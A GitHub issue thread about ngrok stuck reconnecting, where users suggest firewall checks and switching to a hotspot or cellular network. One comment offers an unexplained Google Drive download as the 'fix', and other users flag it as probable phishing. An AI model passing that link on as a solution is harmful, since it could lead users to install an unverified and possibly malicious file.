### ISSUE TITLE
Ngrok always reconnecting

### ISSUE THREAD

**Issue by ryanermita** [inconshreveable/ngrok#363]
I download ngrok here https://ngrok.com/download and follow the instructions.
I run ngrok following this instructions https://ngrok.com/docs#expose
./ngrok http 300

but im always getting this reconnecting issue.
![ngrok](https://cloud.githubusercontent.com/assets/4478433/17762967/afa43a1e-6547-11e6-8cb9-3dd1e4e35318.png)

**Comment by ryanermita** [comment]
this is caused by network issue.

**Comment by ashokkumar24** [comment]
I am facing the same issue :( How can I solve this? Could you please help me on this?

**Comment by ryanermita** [comment]
@ashokkumar24 as far as i remember, there was an issue about firewalls and network setup on our clientele. validate if the ports are open and if there's a network setup please do check if there something blocking ngrok from broadcasting the connection. hope it helps.

**Comment by ashokkumar24** [comment]
@ryanermita Thanks mate :)

**Comment by ryanermita** [comment]
@ashokkumar24 how was it? did you make it work?

**Comment by heroys6** [comment]
For Android users, try to turn on cellular network + Hotspot.

**Comment by saurabh6017** [comment]
i just solve the issue
just download this file
https://drive.google.com/file/d/15366TjwvIuD16oc9GoyEj61GOeDbym8o/view?usp=sharing
thank me later

**Comment by 2mg** [comment]
@saurabh6017 what did you fix _exactly_ ? I'm not downloading a random file...

Android users still have this issue with Termux + ngrok, but I don't want to use cellular, I need it to work over local WiFi. A PC on the same network here works (it's on ethernet though) with ngrok no problem.

**Comment by Nightwalker98** [comment]
> i just solve the issue no hotspot required no host editing required
> just download this file
> https://drive.google.com/file/d/15366TjwvIuD16oc9GoyEj61GOeDbym8o/view?usp=sharing
> thank me later

Phishing detected ;D

**Comment by Nightwalker98** [comment]
> @saurabh6017 what did you fix _exactly_ ? I'm not downloading a random file...
> 
> Android users still have this issue with Termux + ngrok, but I don't want to use cellular, I need it to work over local WiFi. A PC on the same network here works (it's on ethernet though) with ngrok no problem.

Bro don't download his file, because, phishing is detected

**Comment by fjamet001** [comment]
bro im having the same problem too can someone help

**Comment by kiran-alt** [comment]
Change your network connection it will surely work. I have changed my network connection from wifi to mobile hotspot it worked.

**Comment by lexavey** [comment]
I solved this issue by turn on wifi hotspot, android 11 
Only turn on hotspot

**Comment by BlackyTay** [comment]
There is a workaround found on YouTube by Grace, by using Kali Linux, detailed steps are here
https://github.com/inconshreveable/ngrok/issues/446#issuecomment-1602410473

Original YouTube link: https://www.youtube.com/watch?v=ztmgoY5T0QY&ab_channel=Grace
